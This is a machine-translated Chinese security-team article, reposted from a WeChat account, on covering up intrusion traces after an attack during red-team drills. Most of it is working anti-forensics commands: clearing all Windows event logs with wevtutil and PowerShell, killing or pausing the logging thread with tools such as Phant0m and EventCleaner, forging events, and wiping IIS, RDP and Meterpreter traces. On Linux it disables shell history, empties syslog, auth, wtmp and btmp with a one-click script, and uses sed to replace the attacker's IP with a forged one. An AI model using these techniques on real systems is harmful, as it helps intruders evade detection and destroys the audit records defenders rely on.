Intrusion trace cleaning

       Technical communication

  Pay attention to WeChat public number  Z20 Security team  , reply   Add group  , Pull you into the group Discuss technology together .

The official account is copied. , The layout may be a bit messy , You can go to the official account .

In authorized attack and defense drill , After the attack , How to clear logs and operation records without leaving traces , To cover up the invasion Trail , This is actually a detailed technical work . In the tracing of the blue team , The attacker's attack path will be recorded in the log , The left tools will also be analyzed by the blue team , You can find features in the tool , Red team self-developed tools are easier to leave clues . Every operation you do , Will be erased ; The tool you uploaded , Should be safely deleted , In case of being traced to the source and losing points in the drill .

Windows Intrusion trace cleaning

Windows Log clear

Windows Log path ：

 system log ：%SystemRoot%\System32\Winevt\Logs\System.evtx
 Security log ：%SystemRoot%\System32\Winevt\Logs\Security.evtx
 Application log ：%SystemRoot%\System32\Winevt\Logs\Application.evtx

 Log key in the registry ：HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Eventlog

Common security incidents ID：

windows Log clearing method ：

（1） The simplest and rudest way

Start → function , Input  eventvwr  Enter the event viewer , Select Clear log in the right column .

Or use wevtutil

wevtutil el              List all log names in the system 
for /F "tokens=*" %a in ('wevtutil.exe el') DO wevtutil.exe cl "%a"   Clear all logs 
wevtutil cl system       Clean up the system log 
wevtutil cl application  Clean up the application log 
wevtutil cl security     Clean up the security log 

（2）powershell One click to clear Windows The event log

PowerShell -Command "& {Clear-Eventlog -Log Application,System,Security}"
 or 
Get-WinEvent -ListLog Application,Setup,Security -Force | % {Wevtutil.exe cl $_.Logname}

（3） Use script to stop logging

Traverse the event log service process through this script （ special svchost.exe） The thread stack of , And identify the event log thread to kill the event log service thread .

The script did not kill the process , It kills the thread . therefore , Although the event log service appears to be running in the system （ Because the process was not terminated ）, But it doesn't actually work （ Because the thread was terminated ） And the system does not collect logs .

Project address ：hlldz/Phant0m: Windows Event Log Killer (github.com)

Use ：

perform phant0m after , Try logging in to the server remotely , It doesn't log

（4）Windows Single log clear

Project address ：QAX-A-Team/EventCleaner: A tool mainly to erase specified records from Windows event logs, with additional functionalities. (github.com)

This tool is mainly used to learn from Windows Delete the specified record from the event log . You can also pause the log thread , Stop logging .

Use steps ：

1、EventCleaner closehandle   # relieve  security.evtx The file occupied a pit 
2、EventCleaner 100           # Delete  event record id  by  100  Log 
3、EventCleaner suspend       # Pause log thread , Stop logging 
4、do anything without worrying about logs
5、EventCleaner normal        # Restore log thread 
6、delete EventCleaner

（5）Windows Log forgery

Use eventcreate This command-line tool can be used to forge logs or overwrite existing logs with a large amount of custom spam .

eventcreate -l system -so administrator -t warning -d "this is a test" -id 500

IIS journal

IIS Default log path ：

%SystemDrive%\inetpub\logs\LogFiles\W3SVC1\

eliminate WWW journal ：

 Out of Service ：net stop w3svc
 Delete all files in the log directory ：del *.*
 Enable service ：net start w3svc

utilize Windows Secure erase with built-in command

（1）Shift+Delete Shortcut keys permanently delete

Delete files directly , You can still find it in the recycle bin , Use Shift+Delete Shortcut keys can be directly and permanently deleted .

You can use data recovery software , The deleted files will be restored as soon as possible , Otherwise, if the new file is saved and overwrites the original file trace, it will be difficult to recover .

（2）Cipher Command overwrites more than once

After deleting the file , You can use Cipher Command to pass /W Parameter can repeatedly write other data to overwrite the hard disk space of the deleted file , Completely delete data to prevent recovery .

such as , Delete D:\tools A file in a directory , And then execute this command ：

cipher /w:D:\tools

thus ,D The unused space on the disk will be covered three times ： once 0x00、 once 0xFF, A random number , All deleted files cannot be recovered .

（3）Format Command override formatting

Format Command plus /P After the parameter , Will clear each sector first , Then cover with random numbers . And can cover multiple times . such as ：

format D: /P:8

This command means that D The disk is covered with random numbers 8 Time .

Clear Remote Desktop Connection record

After connecting other clients or servers remotely through this machine , The remote desktop connection record will be saved locally . The code is saved as clear.bat file , Double click Run to automatically clear the remote desktop connection record .

@echo off
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp

Metasploit Trace removal

（1） Check the event log

meterpreter > run event_manager  -i   
[*] Retriving Event Log Configuration
Event Logs on System
====================
 Name                    Retention  Maximum Size  Records
 ----                    ---------  ------------  -------
 Application             Disabled   20971520K     2149
 HardwareEvents          Disabled   20971520K     0
 Internet Explorer       Disabled   K             0
 Key Management Service  Disabled   20971520K     0
 Security                Disabled   20971520K     1726
 System                  Disabled   20971520K     3555
 Windows PowerShell      Disabled   15728640K     138

（2） Clear the event log （ There are six log types ）

meterpreter > run event_manager  -c

（3） in addition , You can also type clearv Command to clear the event log of the target system （ Contains only three log types ）

meterpreter > clearev 
[*] Wiping 4 records from Application...
[*] Wiping 8 records from System...
[*] Wiping 7 records from Security...

eliminate recent

 Click... In file explorer “ see ”->“ Options ”-> In the routine -> Click... In privacy ” eliminate ” Button 
 Or open it directly C:\Users\Administrator\Recent And delete everything 
 Or enter... On the command line del /f /s /q “%userprofile%\Recent*.*

Linux Intrusion trace cleaning

（ # Administrators $ Ordinary users / Express root directory ~ Represents the current user's home directory ）

eliminate history Historical command record

View historical operation commands ：

history

history Show Memory and ~/.bash_history Everything in ;
The contents of the memory are not written immediately ~/.bash_history, Only when the current shell The contents of memory will be written to... Only when it is closed shell

（1） edit history Log files , Delete some history commands that you don't want to save .

vim ~/.bash_history

（2） Clear the current user's history Command record

history -c  #  Delete all command history in memory 
history -r  #  Delete current session history 

（3） utilize vim Property deletion history command

# Use vim Open a file vi test.txt#  Set up vim Do not record command ,Vim Will record the command history , Save in viminfo In file .:set history=0#  use vim The split screen function of opens the command record file .bash_history, Edit file delete history operation command ：vsp ~/.bash_history#  Clear preservation .bash_history File can .

（4） stay vim Execute commands you don't want others to see

:set history=0
:!command

Don't record history History commands

（1） By modifying the profile /etc/profile, Make the system no longer Save command records .

HISTSIZE=0

（2） After logging in, execute the following command , Don't record historical commands (.bash_history)

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0

Clear system log traces

Linux There are many kinds of log files in the system , To record the log generated during the operation of the system .

/var/run/utmp  Record the logged in user , Use w,who,users Wait for the order to check 
/var/log/wtmp  Record all login and logout of users , Use last Command view 
/var/log/lastlog  Record the last login time of each user , Use lastlog Command view 
/var/log/btmp  Record all login failure information , Use lastb Command view 
/var/log/auth.log  Operations requiring identity confirmation 
/var/log/secure  Record security related log information 
/var/log/maillog  Record the log information related to the mail 
/var/log/message  Record information and error log after system startup 
/var/log/cron  Record log information related to scheduled tasks 
/var/log/spooler  Record UUCP and news Device related log information 
/var/log/boot.log  Log messages related to Daemon Start and stop 

（1） Empty log file

There are several ways ：

cat /dev/null > filename
echo "" > filename
echo > filename
: > filename
> filename

（2） Replace / Delete some logs

All log files are emptied , It's too easy to be noticed by the Administrator , If you just delete or replace some key log information , Then you can perfectly hide the traces of attack .

Replace ：

# 192.168.100.101 For the attacker IP,10.0.0.55 For forgery IP,-i Edit the file 
sed 's/192.168.100.101/10.0.0.55/g' -i /var/log/btmp*
sed 's/192.168.100.101/10.0.0.55/g' -i /var/log/lastlog
sed 's/192.168.100.101/10.0.0.55/g' -i /var/log/wtmp
sed 's/192.168.100.101/10.0.0.55/g' -i secure
sed 's/192.168.100.101/10.0.0.55/g' -i /var/log/utmp

Delete ：

#  Delete all lines that match the string , For example, by the date of the day or your own login ip
sed  -i '/ Their own ip/'d  /var/log/messages
sed  -i '/ Date of the day /'d  filename

One click to clear history And system log scripts

#!/usr/bin/bash
echo > /var/log/syslog
echo > /var/log/messages
echo > /var/log/httpd/access_log
echo > /var/log/httpd/error_log
echo > /var/log/xferlog
echo > /var/log/secure
echo > /var/log/auth.log
echo > /var/log/user.log
echo > /var/log/wtmp
echo > /var/log/lastlog
echo > /var/log/btmp
echo > /var/run/utmp
rm ~/./bash_history
history -c

eliminate web Log marks

web Logs can also be used sed To forge , for example apache journal 、MySQL journal 、php journal

sed 's/192.168.100.101/10.0.0.55/g' –i /var/log/apache/access.log
sed 's/192.168.100.101/10.0.0.55/g' –i /var/log/apache/error_log

sed 's/192.168.100.101/10.0.0.55/g' –i /var/log/mysql/mysql_error.log
sed 's/192.168.100.101/10.0.0.55/g' –i /var/log/mysql/mysql_slow.log

sed 's/192.168.100.101/192.168.1.4/g' –i /var/log/apache/php_error.log

Clear some relevant logs ：

#  Use grep -v Let's delete our relevant information 
cat /var/log/nginx/access.log | grep -v evil.php > tmp.log
#  Overlay the modified log to the original log file 
cat tmp.log > /var/log/nginx/access.log/

Technical communication

Communication group

Pay attention to the reply of the official account “ Add group ”, add to Z2OBot Small K Automatically pull you to join Z2O Security attack and defense communication group Share more good things .